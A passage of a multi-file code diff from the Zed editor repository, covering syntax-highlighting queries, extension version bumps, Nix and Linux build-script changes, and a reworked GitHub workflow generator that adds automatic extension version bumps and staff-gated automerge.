+ (number_literal)
+ (char_literal)
+] @number
(identifier) @variable
@@ -110,11 +70,11 @@
(statement_identifier) @label
-(type_identifier) @type
-
-(primitive_type) @type
-
-(sized_type_specifier) @type
+[
+ (type_identifier)
+ (primitive_type)
+ (sized_type_specifier)
+] @type
(call_expression
function: (identifier) @function)
@@ -1,6 +1,6 @@
[package]
name = "zed_html"
-version = "0.3.0"
+version = "0.3.1"
edition.workspace = true
publish.workspace = true
license = "Apache-2.0"
@@ -1,7 +1,7 @@
id = "html"
name = "HTML"
description = "HTML support."
-version = "0.3.0"
+version = "0.3.1"
schema_version = 1
authors = ["Isaac Clayton <slightknack@gmail.com>"]
repository = "https://github.com/zed-industries/zed"
@@ -2,11 +2,11 @@
"/>" @close)
(#set! rainbow.exclude))
-(("</" @open
+(("<" @open
">" @close)
(#set! rainbow.exclude))
-(("<" @open
+(("</" @open
">" @close)
(#set! rainbow.exclude))
@@ -95,11 +95,8 @@ impl zed::Extension for HtmlExtension {
server_id: &LanguageServerId,
worktree: &zed::Worktree,
) -> Result<Option<zed::serde_json::Value>> {
- let settings = LspSettings::for_worktree(server_id.as_ref(), worktree)
- .ok()
- .and_then(|lsp_settings| lsp_settings.settings)
- .unwrap_or_default();
- Ok(Some(settings))
+ LspSettings::for_worktree(server_id.as_ref(), worktree)
+ .map(|lsp_settings| lsp_settings.settings)
}
fn language_server_initialization_options(
@@ -77,7 +77,6 @@ let
builtins.elem firstComp topLevelIncludes;
craneLib = crane.overrideToolchain rustToolchain;
- gpu-lib = if withGLES then libglvnd else vulkan-loader;
commonArgs =
let
zedCargoLock = builtins.fromTOML (builtins.readFile ../crates/zed/Cargo.toml);
@@ -179,7 +178,8 @@ let
libva
libxkbcommon
wayland
- gpu-lib
+ libglvnd
+ vulkan-loader
xorg.libX11
xorg.libxcb
libdrm
@@ -224,7 +224,7 @@ let
};
ZED_UPDATE_EXPLANATION = "Zed has been installed using Nix. Auto-updates have thus been disabled.";
RELEASE_VERSION = version;
- ZED_COMMIT_SHA = commitSha;
+ ZED_COMMIT_SHA = lib.optionalString (commitSha != null) "${commitSha}";
LK_CUSTOM_WEBRTC = pkgs.callPackage ./livekit-libwebrtc/package.nix { };
PROTOC = "${protobuf}/bin/protoc";
@@ -236,7 +236,8 @@ let
# about them that's special is that they're manually dlopened at runtime
NIX_LDFLAGS = lib.optionalString stdenv'.hostPlatform.isLinux "-rpath ${
lib.makeLibraryPath [
- gpu-lib
+ libglvnd
+ vulkan-loader
wayland
libva
]
@@ -245,7 +246,7 @@ let
NIX_OUTPATH_USED_AS_RANDOM_SEED = "norebuilds";
};
- # prevent nix from removing the "unused" wayland/gpu-lib rpaths
+ # prevent nix from removing the "unused" wayland rpaths
dontPatchELF = stdenv'.hostPlatform.isLinux;
# TODO: try craneLib.cargoNextest separate output
@@ -74,7 +74,15 @@ fi
export CC=${CC:-$(which clang)}
# Build binary in release mode
-export RUSTFLAGS="${RUSTFLAGS:-} -C link-args=-Wl,--disable-new-dtags,-rpath,\$ORIGIN/../lib"
+# We need lld to link libwebrtc.a successfully on aarch64-linux.
+# NOTE: Since RUSTFLAGS env var overrides all .cargo/config.toml rustflags
+# (see https://github.com/rust-lang/cargo/issues/5376), the
+# [target.aarch64-unknown-linux-gnu] section in config.toml has no effect here.
+if [[ "$(uname -m)" == "aarch64" ]]; then
+ export RUSTFLAGS="${RUSTFLAGS:-} -C link-arg=-fuse-ld=lld -C link-args=-Wl,--disable-new-dtags,-rpath,\$ORIGIN/../lib"
+else
+ export RUSTFLAGS="${RUSTFLAGS:-} -C link-args=-Wl,--disable-new-dtags,-rpath,\$ORIGIN/../lib"
+fi
cargo build --release --target "${target_triple}" --package zed --package cli
# Build remote_server in separate invocation to prevent feature unification from other crates
# from influencing dynamic libraries required by it.
@@ -111,10 +119,12 @@ else
fi
fi
-# Strip debug symbols and save them for upload to DigitalOcean
-objcopy --strip-debug "${target_dir}/${target_triple}/release/zed"
-objcopy --strip-debug "${target_dir}/${target_triple}/release/cli"
-objcopy --strip-debug "${target_dir}/${remote_server_triple}/release/remote_server"
+# Strip debug symbols and save them for upload to DigitalOcean.
+# We use llvm-objcopy because GNU objcopy on older distros (e.g. Ubuntu 20.04)
+# doesn't understand CREL sections produced by newer LLVM.
+llvm-objcopy --strip-debug "${target_dir}/${target_triple}/release/zed"
+llvm-objcopy --strip-debug "${target_dir}/${target_triple}/release/cli"
+llvm-objcopy --strip-debug "${target_dir}/${remote_server_triple}/release/remote_server"
# Ensure that remote_server does not depend on libssl nor libcrypto, as we got rid of these deps.
if ldd "${target_dir}/${remote_server_triple}/release/remote_server" | grep -q 'libcrypto\|libssl'; then
@@ -61,6 +61,25 @@ if (includesIssueUrl) {
);
}
+const MIGRATION_SCHEMA_FILES = [
+ "crates/collab/migrations/20251208000000_test_schema.sql",
+ "crates/collab/migrations.sqlite/20221109000000_test_schema.sql",
+];
+
+const modifiedSchemaFiles = danger.git.modified_files.filter((file) =>
+ MIGRATION_SCHEMA_FILES.some((schemaFilePath) => file.endsWith(schemaFilePath)),
+);
+
+if (modifiedSchemaFiles.length > 0) {
+ warn(
+ [
+ "This PR modifies database schema files.",
+ "",
+ "If you are making database changes, a migration needs to be added in the Cloud repository.",
+ ].join("\n"),
+ );
+}
+
const FIXTURE_CHANGE_ATTESTATION = "Changes to test fixtures are intentional and necessary.";
const FIXTURES_PATHS = ["crates/assistant_tools/src/edit_agent/evals/fixtures"];
@@ -1,29 +0,0 @@
-#!/usr/bin/env bash
-
-set -euox pipefail
-
-if [ "$#" -lt 1 ]; then
- echo "Usage: $0 <language> [version]"
- exit 1
-fi
-
-LANGUAGE=$1
-VERSION=${2:-}
-
-EXTENSION_DIR="extensions/$LANGUAGE"
-EXTENSION_TOML="$EXTENSION_DIR/extension.toml"
-CARGO_TOML="$EXTENSION_DIR/Cargo.toml"
-
-if [ ! -d "$EXTENSION_DIR" ]; then
- echo "Directory $EXTENSION_DIR does not exist."
- exit 1
-fi
-
-if [ -z "$VERSION" ]; then
- grep -m 1 'version =' "$EXTENSION_TOML" | awk -F\" '{print $2}'
- exit 0
-fi
-
-sed -i '' -e "s/^version = \".*\"/version = \"$VERSION\"/" "$EXTENSION_TOML"
-sed -i '' -e "s/^version = \".*\"/version = \"$VERSION\"/" "$CARGO_TOML"
-cargo update --workspace
@@ -39,6 +39,8 @@ if [[ -n $apt ]]; then
make
cmake
clang
+ lld
+ llvm
jq
git
curl
@@ -48,6 +50,8 @@ if [[ -n $apt ]]; then
musl-tools
musl-dev
build-essential
+ pipewire
+ xdg-desktop-portal
)
if (grep -qP 'PRETTY_NAME="(Debian|Raspbian).+13' /etc/os-release); then
# libstdc++-14-dev is in build-essential
@@ -108,6 +112,8 @@ if [[ -n $dnf ]] || [[ -n $yum ]]; then
libzstd-devel
vulkan-loader
sqlite-devel
+ pipewire
+ xdg-desktop-portal
jq
git
tar
@@ -183,6 +189,8 @@ if [[ -n $zyp ]]; then
tar
wayland-devel
xcb-util-devel
+ pipewire
+ xdg-desktop-portal
)
$maysudo "$zyp" install -y "${deps[@]}"
finalize
@@ -211,6 +219,8 @@ if [[ -n $pacman ]]; then
pkgconf
mold
sqlite
+ pipewire
+ xdg-desktop-portal
jq
git
)
@@ -242,6 +252,8 @@ if [[ -n $xbps ]]; then
vulkan-loader
mold
sqlite-devel
+ pipewire
+ xdg-desktop-portal
)
$maysudo "$xbps" -Syu "${deps[@]}"
finalize
@@ -267,6 +279,8 @@ if [[ -n $emerge ]]; then
x11-libs/libxkbcommon
sys-devel/mold
dev-db/sqlite
+ media-video/pipewire
+ sys-apps/xdg-desktop-portal
)
$maysudo "$emerge" -u "${deps[@]}"
finalize
@@ -13,6 +13,7 @@ mod cherry_pick;
mod compare_perf;
mod danger;
mod deploy_collab;
+mod extension_auto_bump;
mod extension_bump;
mod extension_tests;
mod extension_workflow_rollout;
@@ -29,38 +30,99 @@ mod runners;
mod steps;
mod vars;
+#[derive(Clone)]
+pub(crate) struct GitSha(String);
+
+impl AsRef<str> for GitSha {
+ fn as_ref(&self) -> &str {
+ &self.0
+ }
+}
+
+#[allow(
+ clippy::disallowed_methods,
+ reason = "This runs only in a CLI environment"
+)]
+fn parse_ref(value: &str) -> Result<GitSha, String> {
+ const GIT_SHA_LENGTH: usize = 40;
+ (value.len() == GIT_SHA_LENGTH)
+ .then_some(value)
+ .ok_or_else(|| {
+ format!(
+ "Git SHA has wrong length! \
+ Only SHAs with a full length of {GIT_SHA_LENGTH} are supported, found {len} characters.",
+ len = value.len()
+ )
+ })
+ .and_then(|value| {
+ let mut tmp = [0; 4];
+ value
+ .chars()
+ .all(|char| u16::from_str_radix(char.encode_utf8(&mut tmp), 16).is_ok()).then_some(value)
+ .ok_or_else(|| "Not a valid Git SHA".to_owned())
+ })
+ .and_then(|sha| {
+ std::process::Command::new("git")
+ .args([
+ "rev-parse",
+ "--quiet",
+ "--verify",
+ &format!("{sha}^{{commit}}")
+ ])
+ .output()
+ .map_err(|_| "Failed to spawn Git command to verify SHA".to_owned())
+ .and_then(|output|
+ output
+ .status.success()
+ .then_some(sha)
+ .ok_or_else(|| format!("SHA {sha} is not a valid Git SHA within this repository!")))
+ }).map(|sha| GitSha(sha.to_owned()))
+}
+
#[derive(Parser)]
-pub struct GenerateWorkflowArgs {}
+pub(crate) struct GenerateWorkflowArgs {
+ #[arg(value_parser = parse_ref)]
+    /// The Git SHA to use when invoking this command
+ pub(crate) sha: Option<GitSha>,
+}
+
+enum WorkflowSource {
+ Contextless(fn() -> Workflow),
+ WithContext(fn(&GenerateWorkflowArgs) -> Workflow),
+}
struct WorkflowFile {
- source: fn() -> Workflow,
+ source: WorkflowSource,
r#type: WorkflowType,
}
impl WorkflowFile {
fn zed(f: fn() -> Workflow) -> WorkflowFile {
WorkflowFile {
- source: f,
+ source: WorkflowSource::Contextless(f),
r#type: WorkflowType::Zed,
}
}
- fn extension(f: fn() -> Workflow) -> WorkflowFile {
+ fn extension(f: fn(&GenerateWorkflowArgs) -> Workflow) -> WorkflowFile {
WorkflowFile {
- source: f,
+ source: WorkflowSource::WithContext(f),
r#type: WorkflowType::ExtensionCi,
}
}
- fn extension_shared(f: fn() -> Workflow) -> WorkflowFile {
+ fn extension_shared(f: fn(&GenerateWorkflowArgs) -> Workflow) -> WorkflowFile {
WorkflowFile {
- source: f,
+ source: WorkflowSource::WithContext(f),
r#type: WorkflowType::ExtensionsShared,
}
}
- fn generate_file(&self) -> Result<()> {
- let workflow = (self.source)();
+ fn generate_file(&self, workflow_args: &GenerateWorkflowArgs) -> Result<()> {
+ let workflow = match &self.source {
+ WorkflowSource::Contextless(f) => f(),
+ WorkflowSource::WithContext(f) => f(workflow_args),
+ };
let workflow_folder = self.r#type.folder_path();
fs::create_dir_all(&workflow_folder).with_context(|| {
@@ -124,7 +186,7 @@ impl WorkflowType {
}
}
-pub fn run_workflows(_: GenerateWorkflowArgs) -> Result<()> {
+pub fn run_workflows(args: GenerateWorkflowArgs) -> Result<()> {
if !Path::new("crates/zed/").is_dir() {
anyhow::bail!("xtask workflows must be ran from the project root");
}
@@ -138,6 +200,7 @@ pub fn run_workflows(_: GenerateWorkflowArgs) -> Result<()> {
WorkflowFile::zed(danger::danger),
WorkflowFile::zed(deploy_collab::deploy_collab),
WorkflowFile::zed(extension_bump::extension_bump),
+ WorkflowFile::zed(extension_auto_bump::extension_auto_bump),
WorkflowFile::zed(extension_tests::extension_tests),
WorkflowFile::zed(extension_workflow_rollout::extension_workflow_rollout),
WorkflowFile::zed(publish_extension_cli::publish_extension_cli),
@@ -154,7 +217,7 @@ pub fn run_workflows(_: GenerateWorkflowArgs) -> Result<()> {
];
for workflow_file in workflows {
- workflow_file.generate_file()?;
+ workflow_file.generate_file(&args)?;
}
workflow_checks::validate(Default::default())
@@ -3,7 +3,7 @@ use indoc::indoc;
use crate::tasks::workflows::runners::{self, Platform};
use crate::tasks::workflows::steps::{
- self, CommonJobConditions, FluentBuilder as _, NamedJob, dependant_job, named,
+ self, CommonJobConditions, FluentBuilder as _, NamedJob, dependant_job, named, use_clang,
};
use crate::tasks::workflows::vars;
@@ -23,7 +23,7 @@ pub(crate) fn deploy_collab() -> Workflow {
}
fn style() -> NamedJob {
- named::job(
+ named::job(use_clang(
dependant_job(&[])
.name("Check formatting and Clippy lints")
.with_repository_owner_guard()
@@ -33,8 +33,8 @@ fn style() -> NamedJob {
.add_step(steps::cache_rust_dependencies_namespace())
.map(steps::install_linux_dependencies)
.add_step(steps::cargo_fmt())
- .add_step(steps::clippy(Platform::Linux)),
- )
+ .add_step(steps::clippy(Platform::Linux, None)),
+ ))
}
fn tests(deps: &[&NamedJob]) -> NamedJob {
@@ -42,7 +42,7 @@ fn tests(deps: &[&NamedJob]) -> NamedJob {
named::bash("cargo nextest run --package collab --no-fail-fast")
}
- named::job(
+ named::job(use_clang(
dependant_job(deps)
.name("Run tests")
.runs_on(runners::LINUX_XL)
@@ -65,7 +65,7 @@ fn tests(deps: &[&NamedJob]) -> NamedJob {
.add_step(steps::cargo_install_nextest())
.add_step(steps::clear_target_dir_if_large(Platform::Linux))
.add_step(run_collab_tests()),
- )
+ ))
}
fn publish(deps: &[&NamedJob]) -> NamedJob {
@@ -0,0 +1,115 @@
+use gh_workflow::{
+ Event, Expression, Input, Job, Level, Permissions, Push, Strategy, UsesJob, Workflow,
+};
+use indoc::indoc;
+use serde_json::json;
+
+use crate::tasks::workflows::{
+ extensions::WithAppSecrets,
+ run_tests::DETECT_CHANGED_EXTENSIONS_SCRIPT,
+ runners,
+ steps::{self, CommonJobConditions, NamedJob, named},
+ vars::{StepOutput, one_workflow_per_non_main_branch},
+};
+
+/// Generates a workflow that triggers on push to main, detects changed extensions
+/// in the `extensions/` directory, and invokes the `extension_bump` reusable workflow
+/// for each changed extension via a matrix strategy.
+pub(crate) fn extension_auto_bump() -> Workflow {
+ let detect = detect_changed_extensions();
+ let bump = bump_extension_versions(&detect);
+
+ named::workflow()
+ .add_event(
+ Event::default().push(
+ Push::default()
+ .add_branch("main")
+ .add_path("extensions/**")
+ .add_path("!extensions/slash-commands-example/**")
+ .add_path("!extensions/test-extension/**")
+ .add_path("!extensions/workflows/**")
+ .add_path("!extensions/*.md"),
+ ),
+ )
+ .concurrency(one_workflow_per_non_main_branch())
+ .add_job(detect.name, detect.job)
+ .add_job(bump.name, bump.job)
+}
+
+fn detect_changed_extensions() -> NamedJob {
+ let preamble = indoc! {r#"
+ COMPARE_REV="$(git rev-parse HEAD~1)"
+ CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")"
+ "#};
+
+ let filter_new_and_removed = indoc! {r#"
+ # Filter out newly added or entirely removed extensions
+ FILTERED="[]"
+ for ext in $(echo "$EXTENSIONS_JSON" | jq -r '.[]'); do
+ if git show HEAD~1:"$ext/extension.toml" >/dev/null 2>&1 && \
+ [ -f "$ext/extension.toml" ]; then
+ FILTERED=$(echo "$FILTERED" | jq -c --arg e "$ext" '. + [$e]')
+ fi
+ done
+ echo "changed_extensions=$FILTERED" >> "$GITHUB_OUTPUT"
+ "#};
+
+ let script = format!(
+ "{preamble}{detect}{filter}",
+ preamble = preamble,
+ detect = DETECT_CHANGED_EXTENSIONS_SCRIPT,
+ filter = filter_new_and_removed,
+ );
+
+ let step = named::bash(script).id("detect");
+
+ let output = StepOutput::new(&step, "changed_extensions");
+
+ let job = Job::default()
+ .with_repository_owner_guard()
+ .runs_on(runners::LINUX_SMALL)
+ .timeout_minutes(5u32)
+ .add_step(steps::checkout_repo().with_custom_fetch_depth(2))
+ .add_step(step)
+ .outputs([("changed_extensions".to_owned(), output.to_string())]);
+
+ named::job(job)
+}
+
+fn bump_extension_versions(detect_job: &NamedJob) -> NamedJob<UsesJob> {
+ let job = Job::default()
+ .needs(vec![detect_job.name.clone()])
+ .cond(Expression::new(format!(
+ "needs.{}.outputs.changed_extensions != '[]'",
+ detect_job.name
+ )))
+ .permissions(
+ Permissions::default()
+ .contents(Level::Write)
+ .issues(Level::Write)
+ .pull_requests(Level::Write)
+ .actions(Level::Write),
+ )
+ .strategy(
+ Strategy::default()
+ .fail_fast(false)
+            // TODO: Remove the limit. We currently need this to work around the concurrency group issue
+ // where different matrix jobs would be placed in the same concurrency group and thus cancelled.
+ .max_parallel(1u32)
+ .matrix(json!({
+ "extension": format!(
+ "${{{{ fromJson(needs.{}.outputs.changed_extensions) }}}}",
+ detect_job.name
+ )
+ })),
+ )
+ .uses_local(".github/workflows/extension_bump.yml")
+ .with(
+ Input::default()
+ .add("working-directory", "${{ matrix.extension }}")
+ .add("force-bump", false),
+ )
+ .with_app_secrets();
+
+ named::job(job)
+}
@@ -5,11 +5,12 @@ use crate::tasks::workflows::{
extension_tests::{self},
runners,
steps::{
- self, CommonJobConditions, DEFAULT_REPOSITORY_OWNER_GUARD, FluentBuilder, NamedJob,
- checkout_repo, dependant_job, named,
+ self, BASH_SHELL, CommonJobConditions, DEFAULT_REPOSITORY_OWNER_GUARD, FluentBuilder,
+ NamedJob, cache_rust_dependencies_namespace, checkout_repo, dependant_job, named,
},
vars::{
- JobOutput, StepOutput, WorkflowInput, WorkflowSecret, one_workflow_per_non_main_branch,
+ JobOutput, StepOutput, WorkflowInput, WorkflowSecret,
+ one_workflow_per_non_main_branch_and_token,
},
};
@@ -22,6 +23,7 @@ pub(crate) fn extension_bump() -> Workflow {
// TODO: Ideally, this would have a default of `false`, but this is currently not
// supported in gh-workflows
let force_bump = WorkflowInput::bool("force-bump", None);
+ let working_directory = WorkflowInput::string("working-directory", Some(".".to_owned()));
let (app_id, app_secret) = extension_workflow_secrets();
let (check_version_changed, version_changed, current_version) = check_version_changed();
@@ -39,16 +41,17 @@ pub(crate) fn extension_bump() -> Workflow {
&app_id,
&app_secret,
);
- let create_label = create_version_label(
+ let (create_label, tag) = create_version_label(
&dependencies,
&version_changed,
¤t_version,
&app_id,
&app_secret,
);
+ let tag = tag.as_job_output(&create_label);
let trigger_release = trigger_release(
&[&check_version_changed, &create_label],
- current_version,
+ tag,
&app_id,
&app_secret,
);
@@ -59,6 +62,7 @@ pub(crate) fn extension_bump() -> Workflow {
WorkflowCall::default()
.add_input(bump_type.name, bump_type.call_input())
.add_input(force_bump.name, force_bump.call_input())
+ .add_input(working_directory.name, working_directory.call_input())
.secrets([
(app_id.name.to_owned(), app_id.secret_configuration()),
(
@@ -68,7 +72,7 @@ pub(crate) fn extension_bump() -> Workflow {
]),
),
)
- .concurrency(one_workflow_per_non_main_branch())
+ .concurrency(one_workflow_per_non_main_branch_and_token("extension-bump"))
.add_env(("CARGO_TERM_COLOR", "always"))
.add_env(("RUST_BACKTRACE", 1))
.add_env(("CARGO_INCREMENTAL", 0))
@@ -82,10 +86,19 @@ pub(crate) fn extension_bump() -> Workflow {
.add_job(trigger_release.name, trigger_release.job)
}
+fn extension_job_defaults() -> Defaults {
+ Defaults::default().run(
+ RunDefaults::default()
+ .shell(BASH_SHELL)
+ .working_directory("${{ inputs.working-directory }}"),
+ )
+}
+
fn check_version_changed() -> (NamedJob, StepOutput, StepOutput) {
let (compare_versions, version_changed, current_version) = compare_versions();
let job = Job::default()
+ .defaults(extension_job_defaults())
.with_repository_owner_guard()
.outputs([
(version_changed.name.to_owned(), version_changed.to_string()),
@@ -108,25 +121,29 @@ fn create_version_label(
current_version: &JobOutput,
app_id: &WorkflowSecret,
app_secret: &WorkflowSecret,
-) -> NamedJob {
+) -> (NamedJob, StepOutput) {
let (generate_token, generated_token) =
generate_token(&app_id.to_string(), &app_secret.to_string(), None);
+ let (determine_tag_step, tag) = determine_tag(current_version);
let job = steps::dependant_job(dependencies)
+ .defaults(extension_job_defaults())
.cond(Expression::new(format!(
"{DEFAULT_REPOSITORY_OWNER_GUARD} && github.event_name == 'push' && \
github.ref == 'refs/heads/main' && {version_changed} == 'true'",
version_changed = version_changed_output.expr(),
)))
+ .outputs([(tag.name.to_owned(), tag.to_string())])
.runs_on(runners::LINUX_SMALL)
.timeout_minutes(1u32)
.add_step(generate_token)
.add_step(steps::checkout_repo())
- .add_step(create_version_tag(current_version, generated_token));
+ .add_step(determine_tag_step)
+ .add_step(create_version_tag(&tag, generated_token));
- named::job(job)
+ (named::job(job), tag)
}
-fn create_version_tag(current_version: &JobOutput, generated_token: StepOutput) -> Step<Use> {
+fn create_version_tag(tag: &StepOutput, generated_token: StepOutput) -> Step<Use> {
named::uses("actions", "github-script", "v7").with(
Input::default()
.add(
@@ -135,7 +152,7 @@ fn create_version_tag(current_version: &JobOutput, generated_token: StepOutput)
github.rest.git.createRef({{
owner: context.repo.owner,
repo: context.repo.repo,
- ref: 'refs/tags/v{current_version}',
+ ref: 'refs/tags/{tag}',
sha: context.sha
}})"#
},
@@ -144,6 +161,26 @@ fn create_version_tag(current_version: &JobOutput, generated_token: StepOutput)
)
}
+fn determine_tag(current_version: &JobOutput) -> (Step<Run>, StepOutput) {
+ let step = named::bash(formatdoc! {r#"
+ EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')"
+
+ if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then
+ TAG="v${{CURRENT_VERSION}}"
+ else
+ TAG="${{EXTENSION_ID}}-v${{CURRENT_VERSION}}"
+ fi
+
+ echo "tag=${{TAG}}" >> "$GITHUB_OUTPUT"
+ "#})
+ .id("determine-tag")
+ .add_env(("CURRENT_VERSION", current_version.to_string()))
+ .add_env(("WORKING_DIR", "${{ inputs.working-directory }}"));
+
+ let tag = StepOutput::new(&step, "tag");
+ (step, tag)
+}
+
+/// Compares the current and previous commit and checks whether versions changed in between.
pub(crate) fn compare_versions() -> (Step<Run>, StepOutput, StepOutput) {
let check_needs_bump = named::bash(formatdoc! {
@@ -153,8 +190,6 @@ pub(crate) fn compare_versions() -> (Step<Run>, StepOutput, StepOutput) {
if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then
PR_FORK_POINT="$(git merge-base origin/main HEAD)"
git checkout "$PR_FORK_POINT"
- elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then
- git checkout "$BRANCH_PARENT_SHA"
else
git checkout "$(git log -1 --format=%H)"~1
fi
@@ -187,21 +222,29 @@ fn bump_extension_version(
) -> NamedJob {
let (generate_token, generated_token) =
generate_token(&app_id.to_string(), &app_secret.to_string(), None);
- let (bump_version, new_version) = bump_version(current_version, bump_type);
+ let (bump_version, _new_version, title, body, branch_name) =
+ bump_version(current_version, bump_type);
let job = steps::dependant_job(dependencies)
+ .defaults(extension_job_defaults())
.cond(Expression::new(format!(
"{DEFAULT_REPOSITORY_OWNER_GUARD} &&\n({force_bump} == true || {version_changed} == 'false')",
force_bump = force_bump_output.expr(),
version_changed = version_changed_output.expr(),
)))
.runs_on(runners::LINUX_SMALL)
- .timeout_minutes(3u32)
+ .timeout_minutes(5u32)
.add_step(generate_token)
.add_step(steps::checkout_repo())
+ .add_step(cache_rust_dependencies_namespace())
.add_step(install_bump_2_version())
.add_step(bump_version)
- .add_step(create_pull_request(new_version, generated_token));
+ .add_step(create_pull_request(
+ title,
+ body,
+ generated_token,
+ branch_name,
+ ));
named::job(job)
}
@@ -256,7 +299,10 @@ fn install_bump_2_version() -> Step<Run> {
)
}
-fn bump_version(current_version: &JobOutput, bump_type: &WorkflowInput) -> (Step<Run>, StepOutput) {
+fn bump_version(
+ current_version: &JobOutput,
+ bump_type: &WorkflowInput,
+) -> (Step<Run>, StepOutput, StepOutput, StepOutput, StepOutput) {
let step = named::bash(formatdoc! {r#"
BUMP_FILES=("extension.toml")
if [[ -f "Cargo.toml" ]]; then
@@ -270,37 +316,60 @@ fn bump_version(current_version: &JobOutput, bump_type: &WorkflowInput) -> (Step
--no-configured-files "$BUMP_TYPE" "${{BUMP_FILES[@]}}"
if [[ -f "Cargo.toml" ]]; then
- cargo update --workspace
+ cargo +stable update --workspace
fi
NEW_VERSION="$({VERSION_CHECK})"
+ EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')"
+ EXTENSION_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')"
+
+ if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then
+ {{
+ echo "title=Bump version to ${{NEW_VERSION}}";
+ echo "body=This PR bumps the version of this extension to v${{NEW_VERSION}}";
+ echo "branch_name=zed-zippy-autobump";
+ }} >> "$GITHUB_OUTPUT"
+ else
+ {{
+ echo "title=${{EXTENSION_ID}}: Bump to v${{NEW_VERSION}}";
+ echo "body<<EOF";
+ echo "This PR bumps the version of the ${{EXTENSION_NAME}} extension to v${{NEW_VERSION}}.";
+ echo "";
+ echo "Release Notes:";
+ echo "";
+ echo "- N/A";
+ echo "EOF";
+ echo "branch_name=zed-zippy-${{EXTENSION_ID}}-autobump";
+ }} >> "$GITHUB_OUTPUT"
+ fi
echo "new_version=${{NEW_VERSION}}" >> "$GITHUB_OUTPUT"
"#
})
.id("bump-version")
.add_env(("OLD_VERSION", current_version.to_string()))
- .add_env(("BUMP_TYPE", bump_type.to_string()));
+ .add_env(("BUMP_TYPE", bump_type.to_string()))
+ .add_env(("WORKING_DIR", "${{ inputs.working-directory }}"));
let new_version = StepOutput::new(&step, "new_version");
- (step, new_version)
+ let title = StepOutput::new(&step, "title");
+ let body = StepOutput::new(&step, "body");
+ let branch_name = StepOutput::new(&step, "branch_name");
+ (step, new_version, title, body, branch_name)
}
-fn create_pull_request(new_version: StepOutput, generated_token: StepOutput) -> Step<Use> {
- let formatted_version = format!("v{new_version}");
-
+fn create_pull_request(
+ title: StepOutput,
+ body: StepOutput,
+ generated_token: StepOutput,
+ branch_name: StepOutput,
+) -> Step<Use> {
named::uses("peter-evans", "create-pull-request", "v7").with(
Input::default()
- .add("title", format!("Bump version to {new_version}"))
- .add(
- "body",
- format!("This PR bumps the version of this extension to {formatted_version}",),
- )
- .add(
- "commit-message",
- format!("Bump version to {formatted_version}"),
- )
- .add("branch", "zed-zippy-autobump")
+ .add("title", title.to_string())
+ .add("body", body.to_string())
+ .add("commit-message", title.to_string())
+ .add("branch", branch_name.to_string())
.add(
"committer",
"zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>",
@@ -315,7 +384,7 @@ fn create_pull_request(new_version: StepOutput, generated_token: StepOutput) ->
fn trigger_release(
dependencies: &[&NamedJob],
- version: JobOutput,
+ tag: JobOutput,
app_id: &WorkflowSecret,
app_secret: &WorkflowSecret,
) -> NamedJob {
@@ -326,14 +395,20 @@ fn trigger_release(
Some(extension_registry),
);
let (get_extension_id, extension_id) = get_extension_id();
+ let (release_action, pull_request_number) = release_action(extension_id, tag, &generated_token);
let job = dependant_job(dependencies)
+ .defaults(extension_job_defaults())
.with_repository_owner_guard()
.runs_on(runners::LINUX_SMALL)
.add_step(generate_token)
.add_step(checkout_repo())
.add_step(get_extension_id)
- .add_step(release_action(extension_id, version, generated_token));
+ .add_step(release_action)
+ .add_step(enable_automerge_if_staff(
+ pull_request_number,
+ generated_token,
+ ));
named::job(job)
}
@@ -354,14 +429,94 @@ fn get_extension_id() -> (Step<Run>, StepOutput) {
fn release_action(
extension_id: StepOutput,
- version: JobOutput,
+ tag: JobOutput,
+ generated_token: &StepOutput,
+) -> (Step<Use>, StepOutput) {
+ let step = named::uses(
+ "huacnlee",
+ "zed-extension-action",
+ "82920ff0876879f65ffbcfa3403589114a8919c6",
+ )
+ .id("extension-update")
+ .add_with(("extension-name", extension_id.to_string()))
+ .add_with(("push-to", "zed-industries/extensions"))
+ .add_with(("tag", tag.to_string()))
+ .add_env(("COMMITTER_TOKEN", generated_token.to_string()));
+
+ let pull_request_number = StepOutput::new(&step, "pull-request-number");
+
+ (step, pull_request_number)
+}
+
+fn enable_automerge_if_staff(
+ pull_request_number: StepOutput,
generated_token: StepOutput,
) -> Step<Use> {
- named::uses("huacnlee", "zed-extension-action", "v2")
- .add_with(("extension-name", extension_id.to_string()))
- .add_with(("push-to", "zed-industries/extensions"))
- .add_with(("tag", format!("v{version}")))
- .add_env(("COMMITTER_TOKEN", generated_token.to_string()))
+ named::uses("actions", "github-script", "v7")
+ .add_with(("github-token", generated_token.to_string()))
+ .add_with((
+ "script",
+ indoc! {r#"
+ const prNumber = process.env.PR_NUMBER;
+ if (!prNumber) {
+ console.log('No pull request number set, skipping automerge.');
+ return;
+ }
+
+ const author = process.env.GITHUB_ACTOR;
+ let isStaff = false;
+ try {
+ const response = await github.rest.teams.getMembershipForUserInOrg({
+ org: 'zed-industries',
+ team_slug: 'staff',
+ username: author
+ });
+ isStaff = response.data.state === 'active';
+ } catch (error) {
+ if (error.status !== 404) {
+ throw error;
+ }
+ }
+
+ if (!isStaff) {
+ console.log(`Actor ${author} is not a staff member, skipping automerge.`);
+ return;
+ }
+
+ // Assign staff member responsible for the bump
+ const pullNumber = parseInt(prNumber);
+
+ await github.rest.issues.addAssignees({
+ owner: 'zed-industries',
+ repo: 'extensions',
+ issue_number: pullNumber,
+ assignees: [author]
+ });
+ console.log(`Assigned ${author} to PR #${prNumber} in zed-industries/extensions`);
+
+ // Get the GraphQL node ID
+ const { data: pr } = await github.rest.pulls.get({
+ owner: 'zed-industries',
+ repo: 'extensions',
+ pull_number: pullNumber
+ });
+
+ await github.graphql(`
+ mutation($pullRequestId: ID!) {
+ enablePullRequestAutoMerge(input: { pullRequestId: $pullRequestId, mergeMethod: SQUASH }) {
+ pullRequest {
+ autoMergeRequest {
+ enabledAt
+ }
+ }
+ }
+ }
+ `, { pullRequestId: pr.node_id });
+
